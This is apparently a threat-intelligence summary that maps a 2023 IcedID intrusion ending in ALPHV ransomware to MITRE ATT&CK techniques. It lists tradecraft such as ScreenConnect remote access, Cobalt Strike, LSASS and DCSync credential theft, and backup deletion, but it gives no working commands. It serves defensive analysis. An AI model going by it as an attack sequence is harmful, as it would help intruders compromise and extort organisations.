IcedID Brings ScreenConnect and CSharp Streamer to ALPHV Ransomware Deployment

MITRE Techniques

• [T1566.001] Phishing – The intrusion began with a malicious email that enticed the recipient to download a zip archive containing a Visual Basic Script (VBS). “This intrusion began in October 2023 with a malicious email that enticed the recipient to download a zip archive containing a Visual Basic Script (VBS).”
• [T1047] Windows Management Instrumentation – Impacket’s wmiexec and RDP were used to install ScreenConnect on multiple systems, enabling command execution. “They used Impacket’s wmiexec and RDP to install ScreenConnect on multiple systems, enabling them to execute various commands and deploy Cobalt Strike beacons.”
• [T1219] Remote Access Software – ScreenConnect used to access and control compromised hosts. “The threat actor used ScreenConnect on the beachhead…”
• [T1071.001] Application Layer Protocol – Cobalt Strike beacons communicated with the C2 server over HTTP/S, demonstrating web-based C2 traffic. “The beacons were dropped … and established communication with the Cobalt Strike command and control server.”
• [T1003.001] LSASS Memory – Access to LSASS for credential dumping during the intrusion. “LSASS was accessed on the host for credential access.”
• [T1003.006] DCSync – A dcsync operation was performed from the beachhead to a domain controller. “the threat actor performed a dcsync operation from the beachhead host to one of the domain controllers.”
• [T1117] Regsvr32 – The embedded DLL was loaded and executed via regsvr32 after being saved in Temp. “The DLL is saved in C:WindowsTemp370-1.dll and then executes said DLL through regsvr32.”
• [T1218.010] Regsvr32 – Regsvr32 usage to execute the DLL payload observed in the infection chain.
• [T1569.002] Service Execution – ScreenConnect persisted via an auto-start service after installation. “ScreenConnect persists across reboots with an auto-start service.”
• [T1021.001] Remote Desktop – RDP was used extensively for lateral movement between domain controllers and file servers. “RDP was used extensively during the intrusion”
• [T1059.001] PowerShell – PowerShell cradles were used to retrieve Cobalt Strike beacons, often via ScreenConnect. “PowerShell was another tool used to retrieve Cobalt Strike beacons, again with some failures, and yet again using ScreenConnect.”
• [T1560.001] Archive via Utility – The confucius_cpp tool archives data before exfiltration. “we observed … creating multiple ZIP archives.”
• [T1040] Network Sniffing/Discovery – Network discovery and netscan were performed to map the environment. “SoftPerfect netscan” and multiple discovery commands were run.
• [T1083] File and Directory Discovery – Discovery of files and folders during exfiltration preparation. “on each selected folder, the tool will look for files based on keywords and then compress data.”
• [T1486] Data Encrypted for Impact – Final stage encrypts files with ALPHV ransomware. “Data Encrypted for Impact”
• [T1070.004] Indicator Removal: File Deletion – Backups were deleted to cover tracks before encryption. “the threat actor deleting all the backups interactively.”